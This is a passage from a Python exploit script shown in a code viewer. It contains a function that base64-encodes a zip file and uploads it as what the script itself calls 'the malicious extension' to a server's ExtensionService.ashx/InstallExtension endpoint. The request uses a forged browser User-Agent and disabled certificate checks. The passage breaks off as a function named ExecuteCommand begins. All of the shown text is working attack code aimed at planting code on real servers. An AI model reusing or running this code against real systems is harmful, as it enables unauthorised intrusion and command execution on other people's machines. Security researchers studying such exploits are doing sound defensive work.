(url, anti_forgery_token)
| 96 | zip_resources.close() |
| 97 | |
| 98 | def UploadExtension(url, anti_forgery_token): |
| 99 | with open("resources.zip", "rb") as f: |
| 100 | zip_data = f.read() |
| 101 | zip_data_base64 = base64.b64encode(zip_data).decode() |
| 102 | headers = { |
| 103 | "X-Anti-Forgery-Token": anti_forgery_token, |
| 104 | "Content-Type": "application/json", |
| 105 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" |
| 106 | } |
| 107 | url = url + "/Services/ExtensionService.ashx/InstallExtension" |
| 108 | session.cookies.update({"settings": "%7B%22collapsedPanelMap%22%3A%7B%22Inactive%22%3Atrue%7D%7D"}) |
| 109 | try: |
| 110 | response = session.post(url=url, data=f"[\"{zip_data_base64}\"]", headers=headers, verify=False, proxies=proxy) |
| 111 | if response.status_code == 200: |
| 112 | print(f"[+] The malicious extension was uploaded successfully, with the ID: {plugin_guid}") |
| 113 | else: |
| 114 | print("[-] Malicious extension upload failed, please check the network and try again or try to exploit manually") |
| 115 | except Exception as err: |
| 116 | print("[-] Error in func <UploadExtension>, error message: " + str(err)) |
| 117 | |
| 118 | def ExecuteCommand(url): |
| 119 | try: |
no outgoing calls
no test coverage detected